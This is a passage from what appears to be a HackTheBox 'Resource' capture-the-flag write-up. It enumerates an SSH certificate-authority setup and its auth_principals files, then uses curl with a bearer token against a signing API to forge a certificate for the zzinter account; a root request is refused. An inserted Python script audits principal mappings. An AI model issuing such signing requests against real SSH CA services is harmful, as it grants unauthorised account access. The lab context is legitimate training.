auth_principals


Upon gaining the initial foothold, I decided to look further into the SSH configuration, since it appears to accept CA-signed keys.

support@ssg:/etc/ssh$ ll
total 604
drwxr-xr-x   5 root root   4096 Jul 24 12:24 ./
drwxr-xr-x 100 root root   4096 Jul 30 08:45 ../
drwxr-xr-x   2 root root   4096 Feb  8 12:16 auth_principals/
-rw-------   1 root root    399 Feb  8 19:40 ca-analytics
-rw-r--r--   1 root root     94 Feb  8 19:40 ca-analytics.pub
-rw-------   1 root root    432 Feb  8 19:42 ca-it
-rw-r--r--   1 root root    116 Feb  8 19:43 ca-it.pub
-rw-------   1 root root   2655 Feb  8 19:03 ca-security
-rw-r--r--   1 root root    569 Feb  8 19:03 ca-security.pub
-rw-r--r--   1 root root 505426 Jul 19  2023 moduli
-rw-r--r--   1 root root   1650 Jul 19  2023 ssh_config
drwxr-xr-x   2 root root   4096 Feb  7 21:52 ssh_config.d/
-rw-r--r--   1 root root   3240 Feb  7 21:48 sshd_config
drwxr-xr-x   2 root root   4096 Feb  8 12:24 sshd_config.d/
-rw-r--r--   1 root root   3239 Jul 24 12:23 sshd_config.ucf-dist
-rw-------   1 root root   1369 Feb  7 19:37 ssh_host_dsa_key
-rw-r--r--   1 root root    959 Feb  8 19:44 ssh_host_dsa_key-cert.pub
-rw-r--r--   1 root root    598 Feb  7 19:37 ssh_host_dsa_key.pub
-rw-------   1 root root    505 Feb  7 19:37 ssh_host_ecdsa_key
-rw-r--r--   1 root root    531 Feb  8 19:44 ssh_host_ecdsa_key-cert.pub
-rw-r--r--   1 root root    170 Feb  7 19:37 ssh_host_ecdsa_key.pub
-rw-------   1 root root    399 Feb  7 19:37 ssh_host_ed25519_key
-rw-r--r--   1 root root    451 Feb  8 19:44 ssh_host_ed25519_key-cert.pub
-rw-r--r--   1 root root     90 Feb  7 19:37 ssh_host_ed25519_key.pub
-rw-------   1 root root   2590 Feb  7 19:37 ssh_host_rsa_key
-rw-r--r--   1 root root    923 Feb  8 19:44 ssh_host_rsa_key-cert.pub
-rw-r--r--   1 root root    562 Feb  7 19:37 ssh_host_rsa_key.pub
-rw-r--r--   1 root root    342 Dec  7  2020 ssh_import_id

There is the auth_principals directory. It should contain the principal definitions that were used during key signing with the bash script.

sshd config


support@ssg:/etc/ssh$ cat sshd_config | grep -v '^#' && cat sshd_config.d/sshcerts.conf
Include /etc/ssh/sshd_config.d/*.conf
Port 2222
 
PermitRootLogin yes
KbdInteractiveAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem       sftp    /usr/lib/openssh/sftp-server
 
HostKey /etc/ssh/ssh_host_dsa_key
HostKey /etc/ssh/ssh_host_ecdsa_key
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_ed25519_key
HostCertificate /etc/ssh/ssh_host_dsa_key-cert.pub
HostCertificate /etc/ssh/ssh_host_ecdsa_key-cert.pub
HostCertificate /etc/ssh/ssh_host_rsa_key-cert.pub
HostCertificate /etc/ssh/ssh_host_ed25519_key-cert.pub
TrustedUserCAKeys /etc/ssh/ca-it.pub
AuthorizedPrincipalsFile /etc/ssh/auth_principals/%u
PasswordAuthentication no

The sshd configuration shows that it is set up to accept CA-signed keys (TrustedUserCAKeys) and that AuthorizedPrincipalsFile is set to /etc/ssh/auth_principals/%u, where %u expands to the login user name.

principals


support@ssg:/etc/ssh$ ll auth_principals/
total 20
drwxr-xr-x 2 root root 4096 Feb  8 12:16 ./
drwxr-xr-x 5 root root 4096 Jul 24 12:24 ../
-rw-r--r-- 1 root root   10 Feb  8 12:16 root
-rw-r--r-- 1 root root   18 Feb  8 12:16 support
-rw-r--r-- 1 root root   13 Feb  8 12:11 zzinter
 
support@ssg:/etc/ssh$ cat auth_principals/root
root_user
support@ssg:/etc/ssh$ cat auth_principals/support
support
root_user
support@ssg:/etc/ssh$ cat auth_principals/zzinter
zzinter_temp

The auth_principals directory contains files for 3 users with their respective principals. This means I can use this information to sign a key for both the zzinter and root accounts.
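As an added example (not from the writeup), a small Python audit that reproduces the sshd_config and auth_principals layout above as a constructed fixture and reports which local accounts each principal unlocks; the file contents are copied from the listings, while the temp-dir layout and plain one-name-per-line principal files are assumptions.

```python
"""Audit OpenSSH AuthorizedPrincipalsFile mappings (added example, not from the writeup)."""
import os
import tempfile

# Constructed fixture mirroring what the writeup found under /etc/ssh (not the real host).
SSHD_CONFIG = """\
Port 2222
TrustedUserCAKeys /etc/ssh/ca-it.pub
AuthorizedPrincipalsFile /etc/ssh/auth_principals/%u
PasswordAuthentication no
"""
PRINCIPAL_FILES = {"root": "root_user\n", "support": "support\nroot_user\n", "zzinter": "zzinter_temp\n"}


def build_fixture():
    """Write the constructed sshd_config and per-user principal files to a temp dir."""
    base = tempfile.mkdtemp()
    with open(os.path.join(base, "sshd_config"), "w") as fh:
        fh.write(SSHD_CONFIG)
    os.mkdir(os.path.join(base, "auth_principals"))
    for user, body in PRINCIPAL_FILES.items():
        with open(os.path.join(base, "auth_principals", user), "w") as fh:
            fh.write(body)
    return base


def principals_file_pattern(sshd_config_path):
    """Return the AuthorizedPrincipalsFile value, or None if sshd uses only the cert's principals."""
    with open(sshd_config_path) as fh:
        for line in fh:
            parts = line.split()
            if len(parts) == 2 and parts[0].lower() == "authorizedprincipalsfile":
                return parts[1]
    return None


def principal_map(ssh_dir):
    """Map each principal name to the set of local accounts it may log in as (assumes a %u pattern)."""
    pattern = principals_file_pattern(os.path.join(ssh_dir, "sshd_config"))
    if pattern is None or "%u" not in pattern:
        return {}
    # The fixture lives in a temp dir, so remap the absolute /etc/ssh/... directory onto it.
    pdir = os.path.join(ssh_dir, os.path.basename(os.path.dirname(pattern)))
    mapping = {}
    for user in sorted(os.listdir(pdir)):  # each file name is the %u login user
        with open(os.path.join(pdir, user)) as fh:
            for line in fh:
                name = line.strip()
                if name and not name.startswith("#"):
                    mapping.setdefault(name, set()).add(user)
    return mapping


def shared_principals(mapping):
    """Principals that unlock more than one account; one that includes root is the finding to review."""
    return {p: users for p, users in mapping.items() if len(users) > 1}
```

On this fixture the audit reports root_user as shared between the root and support accounts, since the support principals file lists it as well.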

Signing


┌──(kali㉿kali)-[~/…/htb/labs/resource/decommission_old_ca]
└─$ ./sign_key_api.sh ca-itrc.pub zzinter zzinter_temp
Error: 'zzinter_temp' is not a supported principal.
Choose from:
    webserver - external web servers - webadmin user
    analytics - analytics team databases - analytics user
    support - IT support server - support user
    security - SOC servers - support user
 
Usage: ./sign_key_api.sh <public_key_file> <username> <principal>

Doing so with the sign_key_api.sh script fails, as it only supports 4 pre-defined principals. I will need to request the signature manually.

Manual Signing


┌──(kali㉿kali)-[~/…/htb/labs/resource/decommission_old_ca]
└─$ export public_key=$(cat ca-itrc.pub)
 
┌──(kali㉿kali)-[~/…/htb/labs/resource/decommission_old_ca]
└─$ echo $public_key
ssh-rsa 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 ITRC Certifcate CA

I assign the content of the CA's public key to the $public_key variable.

Signing zzinter with zzinter_temp


┌──(kali㉿kali)-[~/…/htb/labs/resource/decommission_old_ca]
└─$ curl -s signserv.ssg.htb/v1/sign -d '{"pubkey": "'"$public_key"'", "username": "zzinter", "principals": "zzinter_temp"}' -H "Content-Type: application/json" -H "Authorization:Bearer 7Tqx6owMLtnt6oeR2ORbWmOPk30z4ZH901kH6UUT6vNziNqGrYgmSve5jCmnPJDE" > zzinter-zzinter_temp.pub
 
┌──(kali㉿kali)-[~/…/htb/labs/resource/decommission_old_ca]
└─$ cat zzinter-zzinter_temp.pub
ssh-rsa-cert-v01@openssh.com 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 ITRC Certifcate CA

After manually signing it via curl, I will use this newly signed public key, together with the CA private key, to authenticate to the target system.

Signing root with root_user


┌──(kali㉿kali)-[~/…/htb/labs/resource/decommission_old_ca]
└─$ curl -s signserv.ssg.htb/v1/sign -d '{"pubkey": "'"$public_key"'", "username": "root", "principals": "root_user"}' -H "Content-Type: application/json" -H "Authorization:Bearer 7Tqx6owMLtnt6oeR2ORbWmOPk30z4ZH901kH6UUT6vNziNqGrYgmSve5jCmnPJDE"
{"detail":"Root access must be granted manually. See the IT admin staff."}

Attempting to sign for the root account fails; the API responds that root access must be granted manually.